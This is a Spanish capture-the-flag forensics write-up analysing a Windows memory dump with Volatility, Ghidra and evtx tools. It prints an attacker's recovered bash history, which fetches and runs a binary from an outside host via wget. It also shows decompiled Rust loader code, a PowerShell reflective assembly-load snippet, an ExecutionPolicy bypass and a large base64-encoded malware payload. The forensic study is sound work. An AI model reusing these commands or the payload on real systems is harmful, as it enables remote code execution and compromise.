Pandora's Bane
23 minutos de lectura
Se nos proporciona un volcado de memoria llamado mem.raw:
$ du -h mem.raw
2,1G mem.raw
$ file mem.raw
mem.raw: data
Análisis de volcado de memoria
Usaremos volatility para analizarlo (específicamente, esta imagen de Docker):
$ docker run --rm -v "${PWD}":/project --entrypoint /bin/sh --platform linux/amd64 -it sk4la/volatility3
/usr/local $ cd /project
/project $ vol -f mem.raw windows.info.Info | tee info.txt
Volatility 3 Framework 2.0.1
Progress: 100.00 PDB scanning finished
Variable Value
Kernel Base 0xf80445604000
DTB 0x1ad000
Symbols file:///usr/local/lib/volatility3/volatility3/symbols/windows/ntkrnlmp.pdb/CA8E2F01B822EDE6357898BFBF862997-1.json.xz
Is64Bit True
IsPAE False
layer_name 0 WindowsIntel32e
memory_layer 1 FileLayer
KdVersionBlock 0xf80446213368
Major/Minor 15.19041
MachineType 34404
KeNumberProcessors 5
SystemTime 2023-03-15 19:49:46
NtSystemRoot C:\Windows
NtProductType NtProductWinNt
NtMajorVersion 10
NtMinorVersion 0
PE MajorOperatingSystemVersion 10
PE MinorOperatingSystemVersion 0
PE Machine 34404
PE TimeDateStamp Wed Jan 4 04:27:11 1995
Ahora podemos enumerar todos los procesos con windows.pstree.PsTree:
/project $ vol -f mem.raw windows.pstree.PsTree | tee pstree.txt
Volatility 3 Framework 2.0.1
Progress: 100.00 PDB scanning finished
PID PPID ImageFileName Offset(V) Threads Handles SessionId Wow64 CreateTime ExitTime
4 0 System 0xdb8d38079080 159 - N/A False 2023-03-16 04:46:54.000000 N/A
* 388 4 smss.exe 0xdb8d3c132040 3 - N/A False 2023-03-16 04:46:54.000000 N/A
* 116 4 Registry 0xdb8d380be080 4 - N/A False 2023-03-16 04:46:53.000000 N/A
* 1588 4 MemCompression 0xdb8d3f757040 26 - N/A False 2023-03-15 19:46:59.000000 N/A
492 480 csrss.exe 0xdb8d3de710c0 11 - 0 False 2023-03-16 04:46:57.000000 N/A
568 480 wininit.exe 0xdb8d3e627080 3 - 0 False 2023-03-16 04:46:57.000000 N/A
* 712 568 services.exe 0xdb8d3e625080 6 - 0 False 2023-03-16 04:46:57.000000 N/A
** 2944 712 svchost.exe 0xdb8d3fd572c0 8 - 0 False 2023-03-15 19:47:01.000000 N/A
** 2308 712 MsMpEng.exe 0xdb8d3fa7a300 36 - 0 False 2023-03-15 19:47:00.000000 N/A
** 2436 712 sppsvc.exe 0xdb8d3fadc080 4 - 0 False 2023-03-15 19:47:00.000000 N/A
** 5636 712 svchost.exe 0xdb8d3e3990c0 4 - 0 False 2023-03-15 19:47:12.000000 N/A
*** 5728 5636 init 0xdb8d3e39b080 3 - 1 False 2023-03-15 19:47:12.000000 N/A
**** 5848 5728 init 0xdb8d3c361080 1 - 1 False 2023-03-15 19:47:12.000000 N/A
** 5252 712 SecurityHealth 0xdb8d402e9080 15 - 0 False 2023-03-15 19:47:13.000000 N/A
** 1928 712 svchost.exe 0xdb8d3815c080 4 - 0 False 2023-03-15 19:47:00.000000 N/A
** 4364 712 svchost.exe 0xdb8d4068e080 4 - 0 False 2023-03-15 19:47:07.000000 N/A
** 1936 712 svchost.exe 0xdb8d38136080 7 - 0 False 2023-03-15 19:47:00.000000 N/A
** 2196 712 svchost.exe 0xdb8d3fa33200 16 - 0 False 2023-03-15 19:47:00.000000 N/A
** 1308 712 svchost.exe 0xdb8d3f66b2c0 20 - 0 False 2023-03-16 04:46:58.000000 N/A
** 4124 712 SgrmBroker.exe 0xdb8d4054c080 7 - 0 False 2023-03-15 19:49:00.000000 N/A
** 6304 712 svchost.exe 0xdb8d4054b080 13 - 0 False 2023-03-15 19:49:01.000000 N/A
** 3880 712 svchost.exe 0xdb8d40121280 6 - 1 False 2023-03-15 19:47:02.000000 N/A
** 5672 712 svchost.exe 0xdb8d3e39c280 0 - 1 False 2023-03-15 19:47:12.000000 2023-03-15 19:47:22.000000
** 1076 712 svchost.exe 0xdb8d3f5d4080 16 - 0 False 2023-03-16 04:46:58.000000 N/A
*** 3180 1076 ctfmon.exe 0xdb8d3ffdd240 12 - 1 False 2023-03-15 19:47:01.000000 N/A
** 6708 712 svchost.exe 0xdb8d4054d080 4 - 0 False 2023-03-15 19:49:02.000000 N/A
** 4408 712 SearchIndexer. 0xdb8d40dc2240 14 - 0 False 2023-03-15 19:47:07.000000 N/A
** 1852 712 svchost.exe 0xdb8d3f69d080 6 - 0 False 2023-03-15 19:47:00.000000 N/A
** 2108 712 svchost.exe 0xdb8d403c8080 9 - 0 False 2023-03-15 19:47:03.000000 N/A
** 1476 712 VBoxService.ex 0xdb8d3f717200 12 - 0 False 2023-03-16 04:46:58.000000 N/A
** 2248 712 wlms.exe 0xdb8d3fa6d200 3 - 0 False 2023-03-15 19:47:00.000000 N/A
** 972 712 svchost.exe 0xdb8d3f4b6240 8 - 0 False 2023-03-16 04:46:57.000000 N/A
** 1488 712 svchost.exe 0xdb8d3f71c2c0 19 - 0 False 2023-03-16 04:46:58.000000 N/A
** 852 712 svchost.exe 0xdb8d3e686240 14 - 0 False 2023-03-16 04:46:57.000000 N/A
*** 3744 852 SearchApp.exe 0xdb8d40294080 29 - 1 False 2023-03-15 19:47:03.000000 N/A
*** 2976 852 WmiPrvSE.exe 0xdb8d4054f080 10 - 0 False 2023-03-15 19:49:22.000000 N/A
*** 2692 852 StartMenuExper 0xdb8d402130c0 8 - 1 False 2023-03-15 19:47:02.000000 N/A
*** 4868 852 WinStore.App.e 0xdb8d3fa2c280 18 - 1 False 2023-03-15 19:47:06.000000 N/A
*** 5092 852 RuntimeBroker. 0xdb8d40dbf2c0 6 - 1 False 2023-03-15 19:47:07.000000 N/A
*** 2920 852 RuntimeBroker. 0xdb8d40dad240 9 - 1 False 2023-03-15 19:47:09.000000 N/A
*** 2828 852 SppExtComObj.E 0xdb8d3fd0e280 3 - 0 False 2023-03-15 19:47:00.000000 N/A
*** 4844 852 ApplicationFra 0xdb8d3fcee080 7 - 1 False 2023-03-15 19:47:06.000000 N/A
*** 6828 852 WindowsPackage 0xdb8d4054e080 4 - 1 False 2023-03-15 19:47:19.000000 N/A
*** 2928 852 TextInputHost. 0xdb8d405c2080 11 - 1 False 2023-03-15 19:47:03.000000 N/A
*** 5168 852 smartscreen.ex 0xdb8d40be6280 9 - 1 False 2023-03-15 19:47:11.000000 N/A
*** 6224 852 MoUsoCoreWorke 0xdb8d3ff62080 11 - 0 False 2023-03-15 19:49:01.000000 N/A
*** 3572 852 RuntimeBroker. 0xdb8d40217240 4 - 1 False 2023-03-15 19:47:03.000000 N/A
*** 5468 852 RuntimeBroker. 0xdb8d40cd90c0 8 - 1 False 2023-03-15 19:47:11.000000 N/A
*** 4760 852 ShellExperienc 0xdb8d3fd792c0 22 - 1 False 2023-03-15 19:47:09.000000 N/A
*** 3996 852 RuntimeBroker. 0xdb8d40490280 2 - 1 False 2023-03-15 19:47:03.000000 N/A
** 1108 712 svchost.exe 0xdb8d3f5dd2c0 15 - 0 False 2023-03-16 04:46:58.000000 N/A
** 1748 712 svchost.exe 0xdb8d3f7e22c0 9 - 0 False 2023-03-15 19:47:00.000000 N/A
** 1112 712 svchost.exe 0xdb8d3f5df2c0 13 - 0 False 2023-03-16 04:46:58.000000 N/A
** 4576 712 NisSrv.exe 0xdb8d407a8080 11 - 0 False 2023-03-15 19:47:05.000000 N/A
** 1636 712 spoolsv.exe 0xdb8d3f9a90c0 9 - 0 False 2023-03-15 19:47:00.000000 N/A
** 1768 712 svchost.exe 0xdb8d3f90d080 13 - 0 False 2023-03-15 19:47:00.000000 N/A
** 2412 712 svchost.exe 0xdb8d3fa2f080 27 - 0 False 2023-03-15 19:47:00.000000 N/A
** 2292 712 svchost.exe 0xdb8d3fe1f280 13 - 1 False 2023-03-15 19:47:01.000000 N/A
** 636 712 svchost.exe 0xdb8d3f57d200 59 - 0 False 2023-03-16 04:46:58.000000 N/A
*** 2184 636 sihost.exe 0xdb8d3fe1d240 13 - 1 False 2023-03-15 19:47:01.000000 N/A
*** 2600 636 taskhostw.exe 0xdb8d3fec5080 0 - 1 False 2023-03-15 19:47:01.000000 2023-03-15 19:47:01.000000
*** 2724 636 MicrosoftEdgeU 0xdb8d3ff46300 5 - 0 True 2023-03-15 19:47:01.000000 N/A
*** 2076 636 taskhostw.exe 0xdb8d3ff5f2c0 8 - 1 False 2023-03-15 19:47:01.000000 N/A
* 736 568 lsass.exe 0xdb8d3e687080 13 - 0 False 2023-03-16 04:46:57.000000 N/A
* 880 568 fontdrvhost.ex 0xdb8d3e6eb140 6 - 0 False 2023-03-16 04:46:57.000000 N/A
584 560 csrss.exe 0xdb8d3de6d240 14 - 1 False 2023-03-16 04:46:57.000000 N/A
668 560 winlogon.exe 0xdb8d3e664080 5 - 1 False 2023-03-16 04:46:57.000000 N/A
* 444 668 dwm.exe 0xdb8d3f546080 26 - 1 False 2023-03-16 04:46:57.000000 N/A
* 884 668 fontdrvhost.ex 0xdb8d3e6ec080 6 - 1 False 2023-03-16 04:46:57.000000 N/A
* 3340 668 userinit.exe 0xdb8d3fff2300 0 - 1 False 2023-03-15 19:47:01.000000 2023-03-15 19:47:25.000000
** 3404 3340 explorer.exe 0xdb8d4004d2c0 67 - 1 False 2023-03-15 19:47:01.000000 N/A
*** 5440 3404 VBoxTray.exe 0xdb8d40547080 12 - 1 False 2023-03-15 19:47:14.000000 N/A
*** 5772 3404 msedge.exe 0xdb8d40548080 31 - 1 False 2023-03-15 19:47:14.000000 N/A
**** 5792 5772 msedge.exe 0xdb8d402e8080 8 - 1 False 2023-03-15 19:47:14.000000 N/A
**** 6136 5772 msedge.exe 0xdb8d402e5080 8 - 1 False 2023-03-15 19:47:15.000000 N/A
**** 6128 5772 msedge.exe 0xdb8d402e7080 16 - 1 False 2023-03-15 19:47:15.000000 N/A
**** 6112 5772 msedge.exe 0xdb8d402e6080 13 - 1 False 2023-03-15 19:47:15.000000 N/A
*** 5148 3404 SecurityHealth 0xdb8d40546080 7 - 1 False 2023-03-15 19:47:13.000000 N/A
5320 5232 WindowsTermina 0xdb8d40bf4080 14 - 1 False 2023-03-15 19:47:11.000000 N/A
* 5536 5320 OpenConsole.ex 0xdb8d38df0080 6 - 1 False 2023-03-15 19:47:12.000000 N/A
* 5556 5320 ubuntu.exe 0xdb8d40c5d080 3 - 1 False 2023-03-15 19:47:12.000000 N/A
** 5812 5556 wsl.exe 0xdb8d3e39f080 3 - 1 False 2023-03-15 19:47:12.000000 N/A
*** 5864 5812 wslhost.exe 0xdb8d3dfa1080 3 - 1 False 2023-03-15 19:47:12.000000 N/A
**** 5872 5864 conhost.exe 0xdb8d3dfa2080 4 - 1 False 2023-03-15 19:47:12.000000 N/A
5880 5856 bash 0xdb8d3dfa3080 1 - 1 False 2023-03-15 19:47:12.000000 N/A
6700 2940 WindowsTermina 0xdb8d3dfa7080 25 - 1 False 2023-03-15 19:49:28.000000 N/A
* 5600 6700 OpenConsole.ex 0xdb8d40bde0c0 6 - 1 False 2023-03-15 19:49:29.000000 N/A
* 5644 6700 powershell.exe 0xdb8d40550080 21 - 1 False 2023-03-15 19:49:29.000000 N/A
Como se puede ver, estamos tratando con una máquina de Windows, pero hay algunas cosas de Linux (ubuntu.exe, bash). En realidad, esta máquina de Windows tiene WSL instalado y en ejecución.
Análisis de WSL
Entonces, usemos linux.bash.Bash para ver el historial de comandos:
/project $ vol -f mem.raw linux.bash.Bash | tee bash.txt
Volatility 3 Framework 2.0.1
Progress: 100.00 Stacking attempts finished
Unsatisfied requirement plugins.Bash.kernel: Linux kernel
Unable to validate the plugin requirements: ['plugins.Bash.kernel']
Bueno… no funcionó porque es un volcado de memoria de Windows, no de Linux. Entonces, enumeremos todos los archivos y busquemos .bash_history:
/project $ vol -f mem.raw windows.filescan.FileScan | tee filescan.txt
Volatility 3 Framework 2.0.1
Progress: 100.00 PDB scanning finished
Offset Name Size
0xdb8d380ac250 \$ConvertToNonresident 216
0xdb8d386f84f0 \Windows\System32\drivers\en-US\ntfs.sys.mui 216
0xdb8d386f87d0 \$Directory 216
0xdb8d386f8d90 \Windows\System32\drivers\crashdmp.sys 216
0xdb8d386f9bf0 \$Directory 216
0xdb8d386f9d60 \$Directory 216
0xdb8d386f9ed0 \Windows\System32\drivers\dumpfve.sys 216
0xdb8d389c4d90 \$MftMirr 216
0xdb8d389c54c0 \$Extend\$UsnJrnl:$J:$DATA 216
...
/project $ grep .bash_history filescan.txt
0xdb8d3deac890 \Users\Rygnarix\AppData\Local\Packages\CanonicalGroupLimited.Ubuntu_79rhkp1fndgsc\LocalState\rootfs\home\user\.bash_history 216
0xdb8d3deae960 \Users\Rygnarix\AppData\Local\Packages\CanonicalGroupLimited.Ubuntu_79rhkp1fndgsc\LocalState\rootfs\home\user\.bash_history 216
Muy bien, vamos a verlo:
/project $ vol -f mem.raw windows.dumpfiles.DumpFiles --virtaddr 0xdb8d3deac890
Volatility 3 Framework 2.0.1
Progress: 100.00 PDB scanning finished
Cache FileObject FileName Result
DataSectionObject 0xdb8d3deac890 .bash_history file.0xdb8d3deac890.0xdb8d3e25a260.DataSectionObject..bash_history.dat
/project $ cat file.0xdb8d3deac890.0xdb8d3e25a260.DataSectionObject..bash_history.dat
rm .bash_history
whoami
id
cat /etc/passwd
ping google.com
ps aux
uname -a
cat /etc/os-release
wget windowsliveupdater.com/updater -O /tmp/.apt-cache
chmod +x /tmp/.apt-cache
/tmp/.apt-cache
Parece que hubo un atacante que obtuvo acceso al WSL y descargó algún archivo, lo guardó como /tmp/.apt-cache y lo ejecutó. Por lo tanto, tomemos este archivo:
/project $ grep .apt-cache filescan.txt
0xdb8d3debe9a0 \Users\Rygnarix\AppData\Local\Packages\CanonicalGroupLimited.Ubuntu_79rhkp1fndgsc\LocalState\rootfs\tmp\.apt-cache 216
0xdb8d3debeb30 \Users\Rygnarix\AppData\Local\Packages\CanonicalGroupLimited.Ubuntu_79rhkp1fndgsc\LocalState\rootfs\tmp\.apt-cache 216
/project $ vol -f mem.raw windows.dumpfiles.DumpFiles --virtaddr 0xdb8d3debe9a0
Volatility 3 Framework 2.0.1
Progress: 100.00 PDB scanning finished
Cache FileObject FileName Result
DataSectionObject 0xdb8d3debe9a0 .apt-cache file.0xdb8d3debe9a0.0xdb8d3e264b20.DataSectionObject..apt-cache.dat
Es un binario ELF:
/project $ grep .apt-cache filescan.txt
0xdb8d3debe9a0 \Users\Rygnarix\AppData\Local\Packages\CanonicalGroupLimited.Ubuntu_79rhkp1fndgsc\LocalState\rootfs\tmp\.apt-cache 216
0xdb8d3debeb30 \Users\Rygnarix\AppData\Local\Packages\CanonicalGroupLimited.Ubuntu_79rhkp1fndgsc\LocalState\rootfs\tmp\.apt-cache 216
/project $ vol -f mem.raw windows.dumpfiles.DumpFiles --virtaddr 0xdb8d3debe9a0
Volatility 3 Framework 2.0.1
Progress: 100.00 PDB scanning finished
Cache FileObject FileName Result
DataSectionObject 0xdb8d3debe9a0 .apt-cache file.0xdb8d3debe9a0.0xdb8d3e264b20.DataSectionObject..apt-cache.dat
/project $ file file.0xdb8d3debe9a0.0xdb8d3e264b20.DataSectionObject..apt-cache.dat
/bin/sh: file: not found
/project $ xxd
^C
/project $ xxd file.0xdb8d3debe9a0.0xdb8d3e264b20.DataSectionObject..apt-cache.dat | head
00000000: 7f45 4c46 0201 0100 0000 0000 0000 0000 .ELF............
00000010: 0300 3e00 0100 0000 30a5 0000 0000 0000 ..>.....0.......
00000020: 4000 0000 0000 0000 3892 4100 0000 0000 @.......8.A.....
00000030: 0000 0000 4000 3800 0e00 4000 2900 2800 ....@.8...@.).(.
00000040: 0600 0000 0400 0000 4000 0000 0000 0000 ........@.......
00000050: 4000 0000 0000 0000 4000 0000 0000 0000 @.......@.......
00000060: 1003 0000 0000 0000 1003 0000 0000 0000 ................
00000070: 0800 0000 0000 0000 0300 0000 0400 0000 ................
00000080: 5003 0000 0000 0000 5003 0000 0000 0000 P.......P.......
00000090: 5003 0000 0000 0000 1c00 0000 0000 0000 P...............
En realidad, es un compilado de Rust…
/project $ strings file.0xdb8d3debe9a0.0xdb8d3e264b20.DataSectionObject..apt-cache.dat | grep -i rust | tail
__rust_alloc_error_handler_should_panic
__rust_alloc_error_handler
_ZN71_$LT$rustc_demangle..legacy..Demangle$u20$as$u20$core..fmt..Display$GT$3fmt17hb8f3b76cb51de4f4E
_ZN3std5alloc8rust_oom17h5129f9213c1813b9E
__rust_foreign_exception
_ZN14rustc_demangle8Demangle6as_str17h55e116f6a433aad5E
__rust_panic_cleanup
_ZN63_$LT$rustc_demangle..Demangle$u20$as$u20$core..fmt..Display$GT$3fmt17hf63e7b42d6c0f488E
__rust_realloc
_ZN14rustc_demangle12try_demangle17h8bc66e4ab41ba7b3E
Ingeniería inversa en Rust
Abramos el binario en Ghidra e intentemos hacerle ingeniería inversa. Esta es la función main:
void main(int param_1, undefined8 param_2) {
code *local_8;
local_8 = _ZN11rust_loader4main17he1dbe5ec8f35a907E;
std::rt::lang_start_internal(&local_8, anon.6b03302ec1ee582ae67c97070480a9e5.0.llvm.11976028101026120347, (long)param_1, param_2, 0);
}
Y está llamando a otra función “main”. Esta es bastante grande, no la mostraré entera por aquí. Sin embargo, vi algunas strings sospechosas:
void _ZN11rust_loader4main17he1dbe5ec8f35a907E(void) {
// ...
std::net::udp::UdpSocket::recv((int)&local_508,&local_6a0,(size_t)&local_430,0x400);
// ...
/* try { // try from 0010c170 to 0010c1da has its CatchHandler @ 0010cb1e */
std::fs::{impl#5}::read_to_end(&local_430,&local_6bc,&local_630);
// ...
_ZN58_$LT$alloc..vec..Vec$LT$u8$GT$$u20$as$u20$hex..FromHex$GT$8from_hex17h4ad6d567acff2bc3E
(puVar10,
"99b97bf329968477cc3aae5dd24fdc12a04177b98f66444e03a9a14c2b1758823a85861eccaadc8ecd4f 36d201a510ce\n $bytes = [System.Convert]::FromBase64String(\"\")\n $asm = [Reflection.Assembly]::Load($bytes)\n $method = $asm.GetType(\"SecurityUpda te.Updater\")\n $method::run()called `Option::unwrap()` on a `None` value/rust c/d5a82bbd26e1ad8b7401f6a718a9c57c96905483/library/alloc/src/collections/btree/naviga te.rs/rustc/d5a82bbd26e1ad8b7401f6a718a9c57c96905483/library/core/src/slice/iter.rs"
);
if (local_430 == NULL) {
local_648 = uStack_428;
uStack_644 = uStack_424;
uStack_640 = local_420;
uStack_63c = uStack_41c;
if (CONCAT44(uStack_414,uStack_418) == 0x20) {
uVar1 = CONCAT44(uStack_41c,local_420);
/* try { // try from 0010c260 to 0010c273 has its CatchHandler @ 0010cb00 */
_ZN58_$LT$alloc..vec..Vec$LT$u8$GT$$u20$as$u20$hex..FromHex$GT$8from_hex17h3e43d3f240902ff1E
(&local_430,
"3a85861eccaadc8ecd4f36d201a510ce\n $bytes = [System.Convert]::FromBase64S tring(\"\")\n $asm = [Reflection.Assembly]::Load($bytes)\n $method = $asm.GetType(\"SecurityUpdate.Updater\")\n $method::run()called `Option: :unwrap()` on a `None` value/rustc/d5a82bbd26e1ad8b7401f6a718a9c57c96905483/libra ry/alloc/src/collections/btree/navigate.rs/rustc/d5a82bbd26e1ad8b7401f6a718a9c57c 96905483/library/core/src/slice/iter.rs"
);
// ...
/* try { // try from 0010c3a6 to 0010c3bf has its CatchHandler @ 0010cacb */
std::sys::unix::process::process_common::Command::new(&local_618,&DAT_001521cf,0xe);
memcpy(&local_508,&local_618,0xd0);
/* try { // try from 0010c3de to 0010c47c has its CatchHandler @ 0010cad5 */
std::sys::unix::process::process_common::Command::arg(&local_508,&DAT_001521dd,8);
std::sys::unix::process::process_common::Command::arg(&local_508,pcStack_6b0,local_6a8);
std::process::Command::output(&local_618,&local_508);
// ...
}
Lo sé, es un desastre. Pero lo importante es que vemos que el binario está ejecutando de alguna manera comandos de PowerShell en la máquina Windows. Podemos enumerar algunos de ellos usando strings (las strings en Rust son raras):
/project $ strings file.0xdb8d3debe9a0.0xdb8d3e264b20.DataSectionObject..apt-cache.dat | grep powershell.exe
called `Result::unwrap()` on an `Err` valuepowershell.exe-Command{Set-ExecutionPolicy -Scope CurrentUser -ExecutionPolicy Unrestricted}src/main.rs{Set-PSReadlineOption
Logs de PowerShell
Vamos a ver los logs de PowerShell:
/project $ grep evtx filescan.txt | grep PowerShell.evtx
0xdb8d3f64d650 \Windows\System32\winevt\Logs\Windows PowerShell.evtx 216
/project $ vol -f mem.raw windows.dumpfiles.DumpFiles --virtaddr 0xdb8d3f64d650
Volatility 3 Framework 2.0.1
Progress: 100.00 PDB scanning finished
Cache FileObject FileName Result
DataSectionObject 0xdb8d3f64d650 Windows PowerShell.evtx file.0xdb8d3f64d650.0xdb8d3f408a90.DataSectionObject.Windows PowerShell.evtx.dat
SharedCacheMap 0xdb8d3f64d650 Windows PowerShell.evtx file.0xdb8d3f64d650.0xdb8d3f684a20.SharedCacheMap.Windows PowerShell.evtx.vacb
Usando python-evtx, podemos transformar el archivo EVTX a datos en XML:
$ evtx_dump.py 'file.0xdb8d3f64d650.0xdb8d3f684a20.SharedCacheMap.Windows PowerShell.evtx.vacb'
<?xml version="1.1" encoding="utf-8" standalone="yes" ?>
<Events>
<Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event"><System><Provider Name="PowerShell"></Provider>
<EventID Qualifiers="0">600</EventID>
<Version>0</Version>
<Level>4</Level>
<Task>6</Task>
<Opcode>0</Opcode>
<Keywords>0x0080000000000000</Keywords>
<TimeCreated SystemTime="2023-03-15 19:13:58.732605"></TimeCreated>
<EventRecordID>558</EventRecordID>
<Correlation ActivityID="" RelatedActivityID=""></Correlation>
<Execution ProcessID="0" ThreadID="0"></Execution>
<Channel>Windows PowerShell</Channel>
<Computer>Galax-35</Computer>
<Security UserID=""></Security>
</System>
<EventData><Data><string>Function</string>
<string>Started</string>
<string> ProviderName=Function
NewProviderState=Started
SequenceNumber=9
HostName=ConsoleHost
HostVersion=5.1.19041.1237
HostId=82c56100-b912-47b4-a95a-1e8977d022fe
HostApplication=powershell.exe -Command
$bytes = [System.Convert]::FromBase64String("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iQCvAxoAkQCvAwYA2QB/AiwA4QA6AzIA6QDKBDUA8QBsAD4A6QBgA0UAoQCvAxAAoQByBFwAqQChA2EAsQCtBGYAuQDlAmsAmQCQAnAACQF+A3AACQHPBHQACQGKBHAACQEdBHoAsQDBBH8AEQGaAAYAmQCvAwYAJwCDAEICLgALAGABLgATAGkBLgAbAIgBLgAjAJEBLgArAJ8BLgAzAJ8BLgA7AJ8BLgBDAJEBLgBLAKUBLgBTAJ8BLgBbAJ8BLgBjAL0BLgBrAOcBLgBzAPQBCAAGAJUAIAAkAE4AwgJBAQMAGAABAEEBBQAsAAEABIAAAAEAAAAAAAAAAAAAAAAA3AIAAAQAAAAAAAAAAAAAAIMACgAAAAAABAAAAAAAAAAAAAAAjACbBAAAAAADAAIAAAAAPE1vZHVsZT4AbXNjb3JsaWIAZnVuYwBWaXJ0dWFsQWxsb2MAbWV0aG9kAFZpcnR1YWxGcmVlAEVuZEludm9rZQBCZWdpbkludm9rZQBJRGlzcG9zYWJsZQBSdW50aW1lVHlwZUhhbmRsZQBHZXRUeXBlRnJvbUhhbmRsZQBkd0ZyZWVUeXBlAGZsQWxsb2NhdGlvblR5cGUARGlzcG9zZQBTZWN1cml0eVVwZGF0ZQBNdWx0aWNhc3REZWxlZ2F0ZQBHdWlkQXR0cmlidXRlAFVudmVyaWZpYWJsZUNvZGVBdHRyaWJ1dGUARGVidWdnYWJsZUF0dHJpYnV0ZQBDb21WaXNpYmxlQXR0cmlidXRlAEFzc2VtYmx5VGl0bGVBdHRyaWJ1dGUAQXNzZW1ibHlUcmFkZW1hcmtBdHRyaWJ1dGUAVGFyZ2V0RnJhbWV3b3JrQXR0cmlidXRlAEFzc2VtYmx5RmlsZVZlcnNpb25BdHRyaWJ1dGUAU2VjdXJpdHlQZXJtaXNzaW9uQXR0cmlidXRlAEFzc2VtYmx5Q29uZmlndXJhdGlvbkF0dHJpYnV0ZQBBc3NlbWJseURlc2NyaXB0aW9uQXR0cmlidXRlAENvbXBpbGF0aW9uUmVsYXhhdGlvbnNBdHRyaWJ1dGUAQXNzZW1ibHlQcm9kdWN0QXR0cmlidXRlAEFzc2VtYmx5Q29weXJpZ2h0QXR0cmlidXRlAEFzc2VtYmx5Q29tcGFueUF0dHJpYnV0ZQBSdW50aW1lQ29tcGF0aWJpbGl0eUF0dHJpYnV0ZQBkd1NpemUAU3lzdGVtLlJ1bnRpbWUuVmVyc2lvbmluZwBGcm9tQmFzZTY0U3RyaW5nAFRvU3RyaW5nAEFzeW5jQ2FsbGJhY2sAY2FsbGJhY2sATWFyc2hhbABpc1ZpcnR1YWwAa2VybmVsMzIuZGxsAHRlc3RfZGxsLmRsbAB0ZXN0X2RsbABnZXRfSXRlbQBTeXN0ZW0AYm9vbQBTZWN1cml0eUFjdGlvbgBTeXN0ZW0uUmVmbGVjdGlvbgBNYW5hZ2VtZW50T2JqZWN0Q29sbGVjdGlvbgBSdW4AWmVybwBNYW5hZ2VtZW50T2JqZWN0U2VhcmNoZXIAVXBkYXRlcgBHZXREZWxlZ2F0ZUZvckZ1bmN0aW9uUG9pbnRlcgBUb0xvd2VyAE1hbmFnZW1lbn